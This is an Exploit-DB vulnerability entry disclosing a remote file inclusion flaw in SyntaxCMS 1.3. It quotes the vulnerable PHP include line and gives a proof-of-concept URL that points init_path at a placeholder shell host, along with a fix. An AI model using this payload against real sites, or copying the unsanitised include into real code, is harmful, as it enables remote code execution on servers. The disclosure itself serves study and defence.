SyntaxCMS <= 1.3 (0004_init_urls.php) Remote File Include Vulnerability



EDB-ID: 2424 CVE: 2006-5055OSVDB-ID: 29124
Author: MoHaJaLiPublished: 2006-09-24Verified: Verified
Exploit Code:   DownloadVulnerable App:   N/A

Rating

(0.0)
Prev Home Next
Remote File Include in syntaxCMS
Vulnerable File:
0004_init_urls.php
Vulnerable Code:
   1  <?php
   2  include_once( $init_path . '/init.urls.php' );
   3  ?>
PoC:
http://www.poweredbysyntaxcmssite.com/admin/testing/tests/0004_init_urls.php?init_path=http://YourShell?&
Solution:
Remove This File...it's not needed...just used for tests
Found by MoHaJaLi
Greetz to Eddy_BAck0o
# milw0rm.com [2006-09-24]






Comments

No comments so far